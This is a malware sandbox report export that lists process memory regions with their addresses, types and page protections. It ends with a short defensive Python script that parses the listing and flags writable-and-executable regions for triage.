page read and write
4C01000
heap
page read and write
1871404E000
heap
page read and write
1E400001000
trusted library allocation
page read and write
1E29CA07000
heap
page read and write
6F68000
heap
page read and write
1E29AD70000
heap
page read and write
1E29D5F3000
heap
page read and write
810000
heap
page read and write
3330000
heap
page read and write
2933000
trusted library allocation
page execute and read and write
55E9000
heap
page read and write
778000
heap
page read and write
2132B93F000
trusted library allocation
page read and write
18712288000
heap
page read and write
2132B990000
trusted library allocation
page read and write
5DBD000
heap
page read and write
1E29D6A9000
heap
page read and write
D65000
heap
page read and write
18714036000
heap
page read and write
B269E7C000
stack
page read and write
D1B000
stack
page read and write
18712243000
heap
page read and write
4BDF000
stack
page read and write
219404D0000
heap
page read and write
2132B842000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
29CE000
trusted library allocation
page read and write
D50000
heap
page read and write
7040000
trusted library allocation
page read and write
1E29CA0A000
heap
page read and write
157E000
stack
page read and write
2132B8CE000
trusted library allocation
page read and write
187147D0000
heap
page read and write
2980000
trusted library allocation
page read and write
DF0000
trusted library allocation
page read and write
1E29CDBF000
heap
page read and write
1871428B000
heap
page read and write
18714354000
heap
page read and write
10F7000
stack
page read and write
21940AF2000
trusted library allocation
page read and write
18714320000
heap
page read and write
580E000
stack
page read and write
50C0000
remote allocation
page read and write
1E29CA2E000
heap
page read and write
2193E65F000
heap
page read and write
2910000
trusted library allocation
page read and write
802000
heap
page read and write
29D5000
trusted library allocation
page read and write
32B8000
stack
page read and write
1E29CA2E000
heap
page read and write
55AD000
heap
page read and write
2193E643000
heap
page read and write
1E29ADA0000
heap
page read and write
36A0000
trusted library allocation
page read and write
5924000
trusted library allocation
page read and write
2132B88D000
trusted library allocation
page read and write
4F5C000
stack
page read and write
36D2000
trusted library allocation
page read and write
18714CBB000
heap
page read and write
5941000
trusted library allocation
page read and write
8920000
heap
page read and write
5551000
trusted library allocation
page read and write
E7E000
stack
page read and write
187121E9000
heap
page read and write
2A9E000
stack
page read and write
5DC1000
heap
page read and write
81D000
heap
page read and write
7250000
trusted library allocation
page read and write
1E29AD70000
heap
page read and write
21940EF2000
trusted library allocation
page read and write
1E29D605000
heap
page read and write
121B000
heap
page read and write
7F30000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
1E29D7BD000
heap
page read and write
5590000
heap
page read and write
1340000
trusted library allocation
page read and write
1E29CD3F000
heap
page read and write
18712020000
heap
page read and write
4761000
trusted library allocation
page read and write
3798000
trusted library allocation
page read and write
2F6F000
stack
page read and write
1E29D6F5000
heap
page read and write
1E29AD72000
heap
page read and write
69EE000
stack
page read and write
219400D0000
heap
page read and write
1BB77CE000
stack
page read and write
55F0000
heap
page read and write
B269EF8000
stack
page read and write
1871403C000
heap
page read and write
49C5000
trusted library allocation
page read and write
18714BEC000
heap
page read and write
2990000
heap
page readonly
6DFE000
stack
page read and write
36D5000
trusted library allocation
page execute and read and write
57EF000
stack
page read and write
187142B3000
heap
page read and write
2132B858000
trusted library allocation
page read and write
B2697FE000
stack
page read and write
6A2E000
stack
page read and write
4C1B000
heap
page read and write
3610000
heap
page read and write
1F9EFFC000
stack
page read and write
219400D6000
heap
page read and write
794000
heap
page read and write
7C54000
heap
page read and write
285E000
stack
page read and write
1E29AB20000
heap
page read and write
7B6000
heap
page read and write
14FF000
stack
page read and write
1E29CD5F000
heap
page read and write
2193E7D0000
heap
page read and write
2AD0000
heap
page read and write
1E29CDBF000
heap
page read and write
2132B93C000
trusted library allocation
page read and write
187122BE000
heap
page read and write
1E29ADD0000
heap
page read and write
1E29AD2C000
heap
page read and write
1871432A000
heap
page read and write
6BFB000
stack
page read and write
FF0000
heap
page execute and read and write
BF0000
heap
page read and write
18712254000
heap
page read and write
18712365000
heap
page read and write
1E29AD93000
heap
page read and write
53D2000
trusted library allocation
page read and write
36A4000
trusted library allocation
page read and write
58B0000
trusted library allocation
page read and write
B269AFF000
stack
page read and write
5843000
trusted library allocation
page read and write
1871402E000
heap
page read and write
7DB0000
trusted library allocation
page read and write
50C0000
remote allocation
page read and write
1871220E000
heap
page read and write
4C1E000
heap
page read and write
1E29AD19000
heap
page read and write
4C01000
heap
page read and write
70E0000
trusted library allocation
page read and write
4C1E000
heap
page read and write
28EF000
stack
page read and write
7C6C000
heap
page read and write
2EEE000
stack
page read and write
71CE000
stack
page read and write
5593000
heap
page read and write
1E29CA2E000
heap
page read and write
13C0000
heap
page read and write
5866000
trusted library allocation
page read and write
2962000
trusted library allocation
page read and write
792000
heap
page read and write
1E29CA2E000
heap
page read and write
1E29D6A9000
heap
page read and write
E241000
trusted library allocation
page read and write
1E29CD27000
heap
page read and write
1E29D72C000
heap
page read and write
1E29CA1E000
heap
page read and write
1871404E000
heap
page read and write
1E29CCF8000
heap
page read and write
2A4E000
unknown
page read and write
55B2000
heap
page read and write
1E29D150000
heap
page read and write
53B0000
heap
page read and write
18714480000
heap
page read and write
D55000
heap
page read and write
1871404E000
heap
page read and write
1E29CA27000
heap
page read and write
18714C00000
heap
page read and write
1E4003C1000
trusted library allocation
page read and write
7030000
trusted library allocation
page read and write
1E29D62C000
heap
page read and write
55B9000
heap
page read and write
7FC0000
heap
page read and write
762E000
stack
page read and write
1871403A000
heap
page read and write
72B0000
trusted library allocation
page read and write
5444000
trusted library allocation
page read and write
C5E000
heap
page read and write
1E29AD92000
heap
page read and write
55A8000
heap
page read and write
5EDE000
heap
page read and write
187122B8000
heap
page read and write
4F9C000
stack
page read and write
B87000
stack
page read and write
36D0000
trusted library allocation
page read and write
21940030000
trusted library allocation
page read and write
3EF1000
trusted library allocation
page read and write
55AA000
heap
page read and write
1E29AD2C000
heap
page read and write
5652000
heap
page read and write
18712253000
heap
page read and write
219409E8000
trusted library allocation
page read and write
1871226D000
heap
page read and write
1E29D655000
heap
page read and write
2928000
heap
page read and write
1E29ACF8000
heap
page read and write
21326B1A000
heap
page read and write
7C43000
heap
page read and write
5938000
trusted library allocation
page read and write
5F6F000
heap
page read and write
1F9F0FC000
stack
page read and write
18714346000
heap
page read and write
7DA0000
heap
page read and write
1871227F000
heap
page read and write
4C1E000
heap
page read and write
1E29D130000
heap
page read and write
7B6000
heap
page read and write
2AC0000
heap
page read and write
35A5000
heap
page read and write
2AA0000
direct allocation
page read and write
2132B844000
trusted library allocation
page read and write
81C1000
trusted library allocation
page read and write
18714348000
heap
page read and write
18714042000
heap
page read and write
18712272000
heap
page read and write
7C64000
heap
page read and write
1BB827B000
stack
page read and write
1E29ADB2000
heap
page read and write
359B000
heap
page read and write
18712100000
heap
page read and write
49C9000
trusted library allocation
page read and write
4E90000
trusted library allocation
page read and write
1BB817E000
stack
page read and write
EA6000
trusted library allocation
page execute and read and write
6F91000
heap
page read and write
5DDD000
heap
page read and write
529E000
stack
page read and write
1E29CA03000
heap
page read and write
18714328000
heap
page read and write
280E000
stack
page read and write
1040000
heap
page read and write
2193E5E0000
heap
page read and write
4C1E000
heap
page read and write
5979000
trusted library allocation
page read and write
1E29D6A9000
heap
page read and write
1E29CA2E000
heap
page read and write
5DDD000
heap
page read and write
1871404E000
heap
page read and write
1E29CC80000
remote allocation
page read and write
187142BB000
heap
page read and write
124F000
heap
page read and write
4FC0000
trusted library allocation
page read and write
18712350000
remote allocation
page read and write
1E29AD7A000
heap
page read and write
1E29CA0E000
heap
page read and write
7C2B000
heap
page read and write
288D000
stack
page read and write
18714450000
heap
page read and write
6AE55FC000
stack
page read and write
2132B910000
trusted library allocation
page read and write
6FA2000
heap
page read and write
18714354000
heap
page read and write
134B000
trusted library allocation
page execute and read and write
1E29ADB2000
heap
page read and write
18714050000
heap
page read and write
4BFC000
heap
page read and write
69AE000
stack
page read and write
5761000
trusted library allocation
page read and write
187142CA000
heap
page read and write
4C1B000
heap
page read and write
18712288000
heap
page read and write
1871404A000
heap
page read and write
18712360000
heap
page read and write
18712241000
heap
page read and write
18714022000
heap
page read and write
1E29AD74000
heap
page read and write
219409DC000
trusted library allocation
page read and write
18712282000
heap
page read and write
360B000
heap
page read and write
55AA000
heap
page read and write
18714066000
heap
page read and write
18714DD7000
heap
page read and write
1E29ADA3000
heap
page read and write
1E29CD32000
heap
page read and write
5EDD000
heap
page read and write
1336000
trusted library allocation
page execute and read and write
1BB7C7D000
stack
page read and write
1E29D7B0000
heap
page read and write
2DD0000
trusted library allocation
page read and write
4BFC000
heap
page read and write
18714CBA000
heap
page read and write
187122B8000
heap
page read and write
1E29CD85000
heap
page read and write
2132B884000
trusted library allocation
page read and write
1E29CD56000
heap
page read and write
6A80000
heap
page read and write
81E000
heap
page read and write
18712120000
heap
page read and write
1E4003C6000
trusted library allocation
page read and write
EC41000
trusted library allocation
page read and write
33C0000
heap
page read and write
1871404E000
heap
page read and write
18712282000
heap
page read and write
187147E0000
trusted library allocation
page read and write
7C5B000
heap
page read and write
5F5E000
heap
page read and write
1E29CD31000
heap
page read and write
B269FFF000
stack
page read and write
1E29AC35000
heap
page read and write
2193E600000
heap
page read and write
5657000
heap
page read and write
187142F1000
heap
page read and write
5640000
heap
page read and write
4C1B000
heap
page read and write
18714020000
heap
page read and write
187142F1000
heap
page read and write
29F0000
heap
page read and write
1E29CA2A000
heap
page read and write
2950000
trusted library allocation
page read and write
1347000
trusted library allocation
page execute and read and write
29F9000
heap
page read and write
58F5000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
3780000
heap
page readonly
2930000
heap
page read and write
1BB7AFE000
stack
page read and write
21940833000
trusted library allocation
page read and write
13AE000
stack
page read and write
1BB7E79000
stack
page read and write
4C1E000
heap
page read and write
5CB0000
heap
page read and write
2132B848000
trusted library allocation
page read and write
572E000
trusted library allocation
page read and write
2132B8D1000
trusted library allocation
page read and write
4FBF000
stack
page read and write
2132B855000
trusted library allocation
page read and write
B26A07F000
stack
page read and write
1E29ADB1000
heap
page read and write
1E29D7A9000
heap
page read and write
1BB81FE000
stack
page read and write
2132B947000
trusted library allocation
page read and write
1E29CEF0000
heap
page read and write
1E29CFD5000
heap
page read and write
8399000
trusted library allocation
page read and write
FCB000
trusted library allocation
page execute and read and write
1E29D6AA000
heap
page read and write
1E29CD56000
heap
page read and write
1E29AD70000
heap
page read and write
187121F0000
heap
page read and write
CC41000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
1F9F5FB000
stack
page read and write
3660000
heap
page read and write
1E29CD20000
heap
page read and write
1E29D7B9000
heap
page read and write
4C01000
heap
page read and write
7FBE000
stack
page read and write
1E29CD34000
heap
page read and write
5DD6000
heap
page read and write
4BFB000
heap
page read and write
5EAD000
heap
page read and write
1E29D6A9000
heap
page read and write
21940010000
trusted library allocation
page read and write
810000
heap
page read and write
4FDE000
stack
page read and write
5E36000
heap
page read and write
7E70000
trusted library allocation
page execute and read and write
4FF0000
heap
page execute and read and write
13B0000
trusted library allocation
page execute and read and write
2960000
trusted library allocation
page read and write
460E000
stack
page read and write
B269DFC000
stack
page read and write
1E29CA2E000
heap
page read and write
1E400223000
trusted library allocation
page read and write
4C20000
heap
page read and write
187121F0000
heap
page read and write
7A8E000
stack
page read and write
709D000
stack
page read and write
5E7A000
heap
page read and write
D60000
heap
page read and write
1E29D7A8000
heap
page read and write
C00000
heap
page read and write
1E29AD73000
heap
page read and write
1871402E000
heap
page read and write
53CE000
stack
page read and write
4C1B000
heap
page read and write
2193E7F0000
heap
page read and write
802000
heap
page read and write
1BB7EF7000
stack
page read and write
2EF7000
trusted library allocation
page read and write
1E29CFC0000
heap
page read and write
6F8000
stack
page read and write
1E29CDB8000
heap
page read and write
3941000
trusted library allocation
page read and write
5886000
trusted library allocation
page read and write
2A00000
heap
page read and write
5652000
heap
page read and write
33D0000
heap
page read and write
7CB0000
trusted library allocation
page execute and read and write
7FDA000
heap
page read and write
1E29CDBA000
heap
page read and write
1E400DCE000
trusted library allocation
page read and write
4BEF000
heap
page read and write
1BB7F78000
stack
page read and write
29DA000
trusted library allocation
page read and write
65BE000
trusted library allocation
page read and write
18712350000
remote allocation
page read and write
1E29CDCC000
heap
page read and write
5050000
heap
page read and write
1E4003CA000
trusted library allocation
page read and write
7AE1000
heap
page read and write
1E29CC80000
remote allocation
page read and write
1E29ADE2000
heap
page read and write
1E29AD48000
heap
page read and write
1E29D682000
heap
page read and write
18712350000
remote allocation
page read and write
2941000
trusted library allocation
page read and write
2132B9E0000
remote allocation
page read and write
1871404E000
heap
page read and write
5F6B000
heap
page read and write
36D7000
trusted library allocation
page execute and read and write
6BBD000
stack
page read and write
1E29AD9E000
heap
page read and write
18712200000
heap
page read and write
4750000
heap
page read and write
4C1B000
heap
page read and write
7D7E000
stack
page read and write
18712244000
heap
page read and write
219409E4000
trusted library allocation
page read and write
1E29D5EC000
heap
page read and write
548E000
stack
page read and write
89F0000
heap
page read and write
685D000
stack
page read and write
2132B9E0000
remote allocation
page read and write
535E000
stack
page read and write
5DCA000
heap
page read and write
18714328000
heap
page read and write
4BF8000
heap
page read and write
1E29D7AC000
heap
page read and write
18714DB9000
heap
page read and write
696B000
stack
page read and write
1E29AC40000
heap
page read and write
1E29AD9E000
heap
page read and write
2132B931000
trusted library allocation
page read and write
36B9000
trusted library allocation
page read and write
1E29ADE2000
heap
page read and write
7C09000
heap
page read and write
6D7E000
stack
page read and write
2193E825000
heap
page read and write
9BF1000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
6AE4FFD000
stack
page read and write
5EE8000
heap
page read and write
18714048000
heap
page read and write
6F9A000
heap
page read and write
1E29CA15000
heap
page read and write
4BEB000
heap
page read and write
1E29CA2B000
heap
page read and write
18714DD6000
heap
page read and write
2132B925000
trusted library allocation
page read and write
5640000
heap
page read and write
153D000
stack
page read and write
1871402E000
heap
page read and write
18714DC5000
heap
page read and write
7210000
trusted library allocation
page read and write
18714BFE000
heap
page read and write
B26ABCD000
stack
page read and write
1E40007E000
trusted library allocation
page read and write
5640000
heap
page read and write
18714CBA000
heap
page read and write
1871226D000
heap
page read and write
8940000
trusted library allocation
page read and write
4BE1000
heap
page read and write
2132B840000
trusted library allocation
page read and write
4C01000
heap
page read and write
B269C7E000
stack
page read and write
1E29AD48000
heap
page read and write
7B6000
heap
page read and write
1F9F1FD000
stack
page read and write
7F10000
trusted library allocation
page read and write
513E000
stack
page read and write
1E29D7A8000
heap
page read and write
187142B3000
heap
page read and write
EAA000
trusted library allocation
page execute and read and write
1BB80FE000
stack
page read and write
4BE0000
heap
page read and write
2132B8AF000
trusted library allocation
page read and write
91F1000
trusted library allocation
page read and write
35FB000
heap
page read and write
A0E000
stack
page read and write
18712272000
heap
page read and write
4BEC000
heap
page read and write
7E90000
trusted library allocation
page read and write
6FE6000
heap
page read and write
49D2000
trusted library allocation
page read and write
8343000
trusted library allocation
page read and write
720D000
stack
page read and write
1E29AD82000
heap
page read and write
55A5000
heap
page read and write
6C3E000
stack
page read and write
18714031000
heap
page read and write
55A3000
heap
page read and write
75E0000
heap
page read and write
1E29AD1E000
heap
page read and write
1E29CA1C000
heap
page read and write
800000
heap
page read and write
1E29CA01000
heap
page read and write
818000
heap
page read and write
1871428D000
heap
page read and write
B269B7D000
stack
page read and write
F641000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
36F0000
trusted library allocation
page read and write
1F9F2FF000
stack
page read and write
758F000
stack
page read and write
47C5000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
1E29ADD0000
heap
page read and write
1871435B000
heap
page read and write
1E29CA11000
heap
page read and write
568E000
heap
page read and write
7CC0000
trusted library allocation
page read and write
187121EF000
heap
page read and write
1E4021CE000
trusted library allocation
page read and write
5F5F000
heap
page read and write
187122B8000
heap
page read and write
56B1000
trusted library allocation
page read and write
1E29CA46000
heap
page read and write
5560000
heap
page read and write
1E29AD18000
heap
page read and write
2ADB000
heap
page read and write
6E32000
heap
page read and write
582B000
stack
page read and write
29C1000
trusted library allocation
page read and write
802000
heap
page read and write
5595000
heap
page read and write
D90000
heap
page read and write
18714023000
heap
page read and write
5591000
heap
page read and write
1E29CA30000
heap
page read and write
5E0B000
heap
page read and write
1871404E000
heap
page read and write
58C6000
trusted library allocation
page read and write
5DBD000
heap
page read and write
1E29ADA0000
heap
page read and write
6313000
trusted library allocation
page read and write
54CE000
stack
page read and write
18712272000
heap
page read and write
2A50000
heap
page read and write
1871432A000
heap
page read and write
B269BFE000
stack
page read and write
800000
heap
page read and write
794000
heap
page read and write
2193E686000
heap
page read and write
6A6A000
stack
page read and write
1E29D5E1000
heap
page read and write
718E000
stack
page read and write
4EB0000
heap
page read and write
6D3E000
stack
page read and write
18714025000
heap
page read and write
5DDD000
heap
page read and write
464F000
stack
page read and write
2DE0000
heap
page execute and read and write
1871226F000
heap
page read and write
5EDD000
heap
page read and write
548E000
stack
page read and write
1E29CD2A000
heap
page read and write
7E1E000
stack
page read and write
21942449000
trusted library allocation
page read and write
2132B934000
trusted library allocation
page read and write
18714CBA000
heap
page read and write
1E29CA1C000
heap
page read and write
5DB5000
heap
page read and write
55E2000
heap
page read and write
1E29CFD0000
heap
page read and write
1324000
trusted library allocation
page read and write
5E5C000
heap
page read and write
6DBE000
stack
page read and write
6C7B000
stack
page read and write
55CD000
heap
page read and write
4BEF000
heap
page read and write
1E29CD20000
heap
page read and write
4ADE000
stack
page read and write
1E29CDB6000
heap
page read and write
509E000
stack
page read and write
1E29D7B5000
heap
page read and write
7D3D000
stack
page read and write
5F66000
heap
page read and write
800000
heap
page read and write
2132B70A000
heap
page read and write
1871404E000
heap
page read and write
5DDD000
heap
page read and write
1E29ADA3000
heap
page read and write
18714348000
heap
page read and write
18714027000
heap
page read and write
570C000
trusted library allocation
page read and write
1E29CD3A000
heap
page read and write
B2697BF000
stack
page read and write
1E29AC30000
heap
page read and write
A241000
trusted library allocation
page read and write
2132B6E7000
heap
page read and write
18714321000
heap
page read and write
A0F0000
trusted library allocation
page read and write
48B7000
trusted library allocation
page read and write
5653000
heap
page read and write
1E29CA2E000
heap
page read and write
7F3E000
stack
page read and write
187121FB000
heap
page read and write
C30000
heap
page read and write
187122BE000
heap
page read and write
7290000
trusted library allocation
page read and write
5912000
trusted library allocation
page read and write
55AD000
heap
page read and write
2132B6F6000
heap
page read and write
55B6000
heap
page read and write
1F9EBFF000
stack
page read and write
1E29CDCF000
heap
page read and write
1E29CA47000
heap
page read and write
4C1B000
heap
page read and write
400000
remote allocation
page execute and read and write
18714030000
heap
page read and write
4BFB000
heap
page read and write
7100000
heap
page execute and read and write
1E29CD2E000
heap
page read and write
18714CBA000
heap
page read and write
1E29D5E1000
heap
page read and write
B4E000
stack
page read and write
1BB8CCD000
stack
page read and write
714E000
stack
page read and write
1E29C6B0000
heap
page read and write
49CE000
trusted library allocation
page read and write
187121FD000
heap
page read and write
571E000
trusted library allocation
page read and write
7013000
heap
page read and write
1E4017CE000
trusted library allocation
page read and write
123E000
heap
page read and write
5678000
heap
page read and write
7D90000
trusted library allocation
page execute and read and write
FC7000
trusted library allocation
page execute and read and write
6AE4AFF000
stack
page read and write
76A000
heap
page read and write
21940623000
trusted library allocation
page read and write
7C38000
heap
page read and write
6F7D000
heap
page read and write
18714328000
heap
page read and write
7F7E000
stack
page read and write
5DD8000
heap
page read and write
21942C49000
trusted library allocation
page read and write
18712288000
heap
page read and write
35E4000
heap
page read and write
4C01000
heap
page read and write
4E20000
heap
page read and write
2E60000
heap
page read and write
792000
heap
page read and write
766F000
stack
page read and write
E94000
trusted library allocation
page read and write
BC41000
trusted library allocation
page read and write
1E29CDCF000
heap
page read and write
33DA000
heap
page read and write
187122A6000
heap
page read and write
58A0000
heap
page read and write
18714610000
heap
page read and write
CA1000
heap
page read and write
18714CBA000
heap
page read and write
5DE2000
heap
page read and write
18714CBA000
heap
page read and write
2132B902000
trusted library allocation
page read and write
187142C5000
heap
page read and write
187142B3000
heap
page read and write
5913000
trusted library allocation
page read and write
4C22000
heap
page read and write
51C0000
heap
page execute and read and write
54F0000
heap
page execute and read and write
7F20000
trusted library allocation
page read and write
2D9F000
unknown
page read and write
1BB807F000
stack
page read and write
187142E6000
heap
page read and write
18714350000
heap
page read and write
1871404E000
heap
page read and write
5540000
heap
page execute and read and write
2194144D000
trusted library allocation
page read and write
18714348000
heap
page read and write
8930000
trusted library allocation
page execute and read and write
55A7000
heap
page read and write
18714CBA000
heap
page read and write
187145F0000
heap
page read and write
5599000
heap
page read and write
1F9EDFF000
stack
page read and write
1E29CA2E000
heap
page read and write
4BF4000
heap
page read and write
18714470000
heap
page read and write
1871402A000
heap
page read and write
187142D1000
heap
page read and write
1E29CA05000
heap
page read and write
52CF000
stack
page read and write
810000
heap
page read and write
7028000
heap
page read and write
1E29CA04000
heap
page read and write
500E000
stack
page read and write
1871404E000
heap
page read and write
2193E68B000
heap
page read and write
AC41000
trusted library allocation
page read and write
4C1E000
heap
page read and write
7ED0000
trusted library allocation
page read and write
28A0000
heap
page read and write
3D0000
heap
page read and write
D60000
heap
page read and write
2132B84E000
trusted library allocation
page read and write
5F6F000
heap
page read and write
568E000
heap
page read and write
364A000
heap
page read and write
590F000
stack
page read and write
1E29D768000
heap
page read and write
B269A7E000
stack
page read and write
7ACF000
stack
page read and write
55AE000
heap
page read and write
4C00000
heap
page read and write
1E29CA16000
heap
page read and write
7C7000
heap
page read and write
1871226F000
heap
page read and write
294F000
trusted library allocation
page read and write
1E29AD83000
heap
page read and write
B26AC4E000
stack
page read and write
49BB000
trusted library allocation
page read and write
18712282000
heap
page read and write
187122A6000
heap
page read and write
D50000
trusted library allocation
page read and write
289E000
stack
page read and write
18714C64000
heap
page read and write
18714024000
heap
page read and write
4BEF000
heap
page read and write
1E29CA2E000
heap
page read and write
1871403E000
heap
page read and write
1E29AD9E000
heap
page read and write
380000
heap
page read and write
18714048000
heap
page read and write
2EF1000
trusted library allocation
page read and write
7D50000
heap
page execute and read and write
55B6000
heap
page read and write
1871404E000
heap
page read and write
4E5C000
stack
page read and write
55E9000
heap
page read and write
70C0000
trusted library allocation
page read and write
1871404E000
heap
page read and write
1BB7A73000
stack
page read and write
133A000
trusted library allocation
page execute and read and write
1E29AD75000
heap
page read and write
187142EF000
heap
page read and write
1580000
heap
page read and write
219400C0000
trusted library allocation
page read and write
1E29CDC7000
heap
page read and write
36AD000
trusted library allocation
page execute and read and write
D90000
heap
page read and write
327C000
stack
page read and write
7EA0000
trusted library allocation
page read and write
6AE53FE000
stack
page read and write
55AA000
heap
page read and write
1E29CA2E000
heap
page read and write
5DB0000
heap
page read and write
1E29CA2E000
heap
page read and write
1360000
trusted library allocation
page read and write
4F9D000
stack
page read and write
1E29D7A8000
heap
page read and write
81D000
heap
page read and write
4C1E000
heap
| Base Address | Region type | Protect |
|---|---|---|
| | | page read and write |
| 7D80000 | heap | page read and write |
| 21326B5A000 | heap | page read and write |
| 18714DBA000 | heap | page read and write |
| 2132B880000 | trusted library allocation | page read and write |
| 2810000 | heap | page read and write |
| 2132B896000 | trusted library allocation | page read and write |
| 5640000 | heap | page read and write |
| 70A0000 | trusted library allocation | page read and write |
| 18712246000 | heap | page read and write |
| 1E29CD98000 | heap | page read and write |
| 7E5D000 | stack | page read and write |
| 18712245000 | heap | page read and write |
| B269D79000 | stack | page read and write |
| 1871432A000 | heap | page read and write |
| 7E60000 | trusted library allocation | page read and write |
| 6250000 | heap | page read and write |
| 1BB7FFD000 | stack | page read and write |
| 1E29CFE0000 | heap | page read and write |
| 624C000 | stack | page read and write |
| 1E29CD26000 | heap | page read and write |
| 1F9EAFF000 | stack | page read and write |
| 18714D03000 | heap | page read and write |
| 58A6000 | trusted library allocation | page read and write |
| 550E000 | stack | page read and write |
| 1871404E000 | heap | page read and write |
| 54CF000 | stack | page read and write |
| 1E29D6C1000 | heap | page read and write |
| 5652000 | heap | page read and write |
| 1E29CDB8000 | heap | page read and write |
| 18713CD0000 | heap | page read and write |
| 18714CCD000 | heap | page read and write |
| 1320000 | trusted library allocation | page read and write |
| 7FE6000 | heap | page read and write |
| 2193E820000 | heap | page read and write |
| E84000 | trusted library allocation | page read and write |
| A8B000 | stack | page read and write |
| 292E000 | stack | page read and write |
| 1871404E000 | heap | page read and write |
| 815000 | heap | page read and write |
| 1E29ADB2000 | heap | page read and write |
| 4E80000 | trusted library allocation | page execute and read and write |
| 18714CBA000 | heap | page read and write |
| 7B4000 | heap | page read and write |
| 6AE4BFF000 | stack | page read and write |
| 1BB8C4E000 | stack | page read and write |
| 1E29CA10000 | heap | page read and write |
| 4BE4000 | heap | page read and write |
| 1E29CCFA000 | heap | page read and write |
| 802000 | heap | page read and write |
| 1E29CDCF000 | heap | page read and write |
| 511E000 | stack | page read and write |
| 2920000 | heap | page read and write |
| 6AE52FE000 | stack | page read and write |
| 2194068B000 | trusted library allocation | page read and write |
| 7C31000 | heap | page read and write |
| 5652000 | heap | page read and write |
| 6F30000 | heap | page read and write |
| 1F9F3FE000 | stack | page read and write |
| EB0000 | heap | page read and write |
| 4BE3000 | heap | page read and write |
| 1E402BCE000 | trusted library allocation | page read and write |
| 55A4000 | heap | page read and write |
| 29F0000 | heap | page read and write |
| FBF000 | stack | page read and write |
| 2EFF000 | trusted library allocation | page read and write |
| 55F6000 | heap | page read and write |
| 4FC5000 | trusted library allocation | page read and write |
| 1210000 | heap | page read and write |
| 13D0000 | heap | page read and write |
| 21940600000 | heap | page execute and read and write |
| 4C00000 | heap | page read and write |
| 219404EE000 | heap | page read and write |
| 4650000 | heap | page execute and read and write |
| 7860000 | heap | page read and write |
| 2132B870000 | trusted library allocation | page read and write |
| 1E29CA0E000 | heap | page read and write |
| 356E000 | heap | page read and write |
| 1E29CA22000 | heap | page read and write |
| 2193E61F000 | heap | page read and write |
| 4E7E000 | stack | page read and write |
| 442E000 | stack | page read and write |
| 81D000 | heap | page read and write |
| 3CE000 | stack | page read and write |
| 7DDF000 | stack | page read and write |
| 2934000 | trusted library allocation | page read and write |
| 18714BEC000 | heap | page read and write |
| 1E29AD2C000 | heap | page read and write |
| 1E29ACF0000 | heap | page read and write |
| 5DDE000 | heap | page read and write |
| 728000 | heap | page read and write |
| 570F000 | stack | page read and write |
| 5580000 | heap | page read and write |
| 1E29D7C6000 | heap | page read and write |
| 4C1B000 | heap | page read and write |
| 187121EA000 | heap | page read and write |
| 4C01000 | heap | page read and write |
| 57CE000 | trusted library allocation | page read and write |
| 1BB7CFE000 | stack | page read and write |
| 7CD0000 | trusted library allocation | page read and write |
| 810000 | heap | page read and write |
| 33BE000 | stack | page read and write |
| 4BE6000 | heap | page read and write |
| 18712219000 | heap | page read and write |
| 5F21000 | heap | page read and write |
| 5850000 | heap | page read and write |
| 692D000 | stack | page read and write |
| 4BE3000 | heap | page read and write |
| C8B000 | heap | page read and write |
| 72C0000 | trusted library allocation | page read and write |
| 2132B95A000 | trusted library allocation | page read and write |
| 2132B840000 | trusted library allocation | page read and write |
| 1E29CD35000 | heap | page read and write |
1175 further memdumps are not included in this export of the report.
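The memdump table is exported as one field per line, which makes it awkward to triage by hand. The following Python is an added example (not part of the sandbox report) that regroups such a flattened listing into records, flags regions mapped both writable and executable (the "page execute and read and write" entries, which in a script-dropper chain like this one are where unpacked or injected code usually lives), and separates 32-bit from 64-bit address spaces. The SAMPLE rows are a subset copied from the table above; the function names and the address-width heuristic are my own.

```python
import re
from collections import Counter

# Subset of rows copied from the memdump table above, in the same
# flattened one-field-per-line layout the export uses.
SAMPLE = """\
7D80000
heap
page read and write
4E80000
trusted library allocation
page execute and read and write
6AE4BFF000
stack
page read and write
21940600000
heap
page execute and read and write
4C00000
heap
page read and write
4650000
heap
page execute and read and write
2132B870000
trusted library allocation
page read and write
"""

# Base addresses in the export are bare upper-case hex, no 0x prefix.
ADDR_RE = re.compile(r"^[0-9A-F]{4,16}$")
# Region type values seen in this report; used to confirm a record boundary.
REGION_TYPES = {"heap", "stack", "trusted library allocation"}


def parse_memdumps(text):
    """Regroup the flattened listing into (address, region, protect) records.

    A record starts at a line that looks like a hex address and is followed
    by a known region type; the third line is the page protection. Stray
    lines before the first complete record (for example a protection field
    left over from a record split across an export boundary) are skipped,
    not guessed at.
    """
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records = []
    i = 0
    while i < len(lines):
        if (ADDR_RE.match(lines[i]) and i + 2 < len(lines)
                and lines[i + 1] in REGION_TYPES):
            records.append({
                "address_hex": lines[i],
                "address": int(lines[i], 16),
                "region": lines[i + 1],
                "protect": lines[i + 2],
            })
            i += 3
        else:
            i += 1
    return records


def address_bits(address):
    """Heuristic: anything above the 4 GiB boundary can only come from a
    64-bit process; the report mixes 32-bit (RegAsm.exe) and 64-bit hosts."""
    return 64 if address > 0xFFFFFFFF else 32


def flag_rwx(records):
    """Regions that are writable and executable at once: the first thing
    to dump and scan for shellcode or an unpacked PE."""
    return [r for r in records
            if "execute" in r["protect"] and "write" in r["protect"]]


def summarize(records):
    """Count regions per (region type, protection) pair for a quick overview."""
    return Counter((r["region"], r["protect"]) for r in records)


if __name__ == "__main__":
    recs = parse_memdumps(SAMPLE)
    for r in flag_rwx(recs):
        print(f"RWX {r['region']:<27} {r['address_hex']:>12} ({address_bits(r['address'])}-bit)")
    for (region, protect), n in sorted(summarize(recs).items()):
        print(f"{n:3d}  {region:<27} {protect}")
```

Run against the full export, the RWX filter reduces a listing of over a thousand regions to the handful worth dumping first; the address-width split tells you which of the spawned processes (32-bit CLR host versus 64-bit script hosts) each of those regions belongs to before you open the dumps.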